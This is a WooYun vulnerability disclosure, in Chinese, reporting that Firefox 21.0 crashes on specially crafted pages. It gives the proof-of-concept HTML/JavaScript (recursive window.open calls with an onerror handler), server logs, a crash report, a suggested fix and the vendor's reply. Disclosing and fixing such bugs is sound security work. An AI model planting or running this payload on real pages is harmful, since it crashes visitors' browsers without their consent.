当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-027215

漏洞标题:火狐浏览器21.0打开特定网页可能导致拒绝服务问题

相关厂商:火狐浏览器

漏洞作者: blast

提交时间:2013-06-30 13:43

修复时间:2013-09-28 13:43

公开时间:2013-09-28 13:43

漏洞类型:拒绝服务

危害等级:低

自评Rank:3

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-06-30: 细节已通知厂商并且等待厂商处理中
2013-07-01: 厂商已经确认,细节仅向厂商公开
2013-07-04: 细节向第三方安全合作伙伴开放
2013-08-25: 细节向核心白帽子及相关领域专家公开
2013-09-04: 细节向普通白帽子公开
2013-09-14: 细节向实习白帽子公开
2013-09-28: 细节向公众公开

简要描述:

火狐浏览器21.0拒绝服务问题,打开某些恶意构造的网页可能导致火狐直接崩溃。

详细说明:

打开如下页面会导致火狐崩溃,ie,chrome无影响,建议厂商修复一下^ ^
以下代码放在http://lno.pw/exp1.htm处

<html>
<script>
function test(){
window.onerror=new Function("history.go(-1)");
window.open('http://lno.pw/exp1.htm');
test();
}
test();
</script>
</html>


以下代码放在http://lno.pw/exp2.htm处:

<html>
<script>
function test(){
//window.onerror=new Function("history.go(-1)");
window.open('http://lno.pw/exp1.htm');
test();
}
test();
</script>
</html>


访问http://lno.pw/exp1.htm 然后访问http://lno.pw/exp2.htm

漏洞证明:

打开以后,程序失去响应,然后崩溃。(火狐拦截弹出窗口功能打开状态)
估计是因为Firefox阻止了页面的弹窗,所以脚本产生了异常,例如

<html>
<script>
function x(){alert(33);}
function test(){
window.onerror=x();
window.open('http://lno.pw/');
}
test();
</script>
</html>


被拦截弹窗后,会弹出“33”的对话框
查看服务器日志,只有一个exp1.htm/ exp2.htm的请求,所以应该是全部都被拦截了
58.242.246.14 - - [29/Jun/2013:23:41:52 +0800] "GET /exp1.htm HTTP/1.1" 200 149 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0"
58.242.246.14 - - [29/Jun/2013:23:42:05 +0800] "GET /exp2.htm HTTP/1.1" 200 199 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0"
而上述代码则会不断的刷新页面并且生成弹窗请求,如果计算机速度够快这儿应该不会弹出来页面脚本正忙的提示,有可能exp1.htm下就会崩溃,即使exp1.htm没有崩溃,打开exp2.htm的时候,貌似也达到了它的计数器上限,之后火狐就崩溃了,在自己的机器和同学的机器上都测试过会崩溃
同学机子上的效果:

123123.jpg


我的机子上的效果:
http://v.youku.com/v_show/id_XNTc3MDEzNzQ0.html
密码是abc
崩溃信息:

AdapterDeviceID: 0x0046
AdapterVendorID: 0x8086
Add-ons: coba%40mozilla.com.cn:1.0.13,netvideohunter%40netvideohunter.com:1.9.5,personas%40christopher.beard:2.0.0,pig1717%40gmail.com:1.1.3.1,qqmail_plugin_for_firefox%40tencent.com:1.0.0.9,txftn%40tencent.com:1.0.0.6,undoclosedtabsbutton%40supernova00.biz:3.7.1,%7B097d3191-e6fa-4728-9826-b533d755359d%7D:0.7.18,%7B66E978CD-981F-47DF-AC42-E3CF417C1467%7D:0.4.3,%7Bbb6bc1bb-f824-4702-90cd-35e2fb24f25d%7D:1.5.1.1,%7B9c51bd27-6ed8-4000-a2bf-36cb95c0c947%7D:11.0.1,%7B8f8fe09b-0bd3-4470-bc1b-8cad42b8203a%7D:0.17,xssme%40security.compass:0.4.6,%7B455D905A-D37C-4643-A9E2-F6FEFAA0424A%7D:0.8.16,tabimprovelite%40mozillaonline.com:1.7,cpmanager%40mozillaonline.com:0.6.26,firegestures%40xuldev.org:1.7.6,%7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:21.0,firebug%40software.joehewitt.com:1.11.4
AvailablePageFile: 12232658944
AvailablePhysicalMemory: 3943645184
AvailableVirtualMemory: 3502358528
BuildID: 20130511120803
CrashTime: 1372520538
EMCheckCompatibility: true
Email: [email protected]
FramePoisonBase: 00000000f0de0000
FramePoisonSize: 65536
InstallTime: 1369281773
Notes: AdapterVendorID: 0x8086, AdapterDeviceID: 0x0046, AdapterSubsysID: 396c17aa, AdapterDriverVersion: 8.15.10.2993
Has dual GPUs. GPU #2: AdapterVendorID2: 0x10de, AdapterDeviceID2: 0x0a29, AdapterSubsysID2: 396c17aa, AdapterDriverVersion2: 9.18.13.697
ProductID: {ec8030f7-c20a-464f-9b0e-13a3a9e97384}
ProductName: Firefox
ReleaseChannel: release
SecondsSinceLastCrash: 819
StartupTime: 1372519732
SystemMemoryUsePercentage: 52
Theme: classic/1.0
Throttleable: 1
TotalVirtualMemory: 4294836224
URL: about:blank
Vendor: Mozilla
Version: 21.0
Winsock_LSP: MSAFD Tcpip [TCP/IPv6] : 2 : 1 : %SystemRoot%\system32\mswsock.dll 
 MSAFD Tcpip [UDP/IPv6] : 2 : 2 :  
 MSAFD Tcpip [RAW/IPv6] : 2 : 3 : %SystemRoot%\system32\mswsock.dll 
 MSAFD Tcpip [TCP/IP] : 2 : 1 :  
 MSAFD Tcpip [UDP/IP] : 2 : 2 : %SystemRoot%\system32\mswsock.dll 
 MSAFD Tcpip [RAW/IP] : 2 : 3 :  
 RSVP TCPv6 服务提供商 : 2 : 1 : %SystemRoot%\system32\mswsock.dll 
 RSVP TCP 服务提供商 : 2 : 1 :  
 RSVP UDPv6 服务提供商 : 2 : 2 : %SystemRoot%\system32\mswsock.dll 
 RSVP UDP 服务提供商 : 2 : 2 :  
 MSAFD RfComm [Bluetooth] : 2 : 1 : %SystemRoot%\system32\mswsock.dll 
 VMCI sockets DGRAM : 0 : 2 :  
 VMCI sockets STREAM : 0 : 1 : %SystemRoot%\system32\vsocklib.dll
此报告同时包含了应用程序崩溃时状态的技术信息。

修复方案:

建议不要记录那么多的弹出窗口记录,比如Chrome貌似就记录了最后的100个(只是貌似,小菜我是目测的= =)

版权声明:转载请注明来源 blast@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:3

确认时间:2013-07-01 11:10

厂商回复:

经分析,测试页面存在明显的、非正常的javascript脚本,当火狐打开该页面时调用这些脚本引发用户浏览器死锁以致崩溃。
我们认为,从这个问题的触发方式、涉及范围、实际影响以及造成的危害来看,还未达到“浏览器漏洞”的高度。
不过类似的问题报告确实可以促进浏览器更加强壮。希望继续努力共建互联网世界。

最新状态:

暂无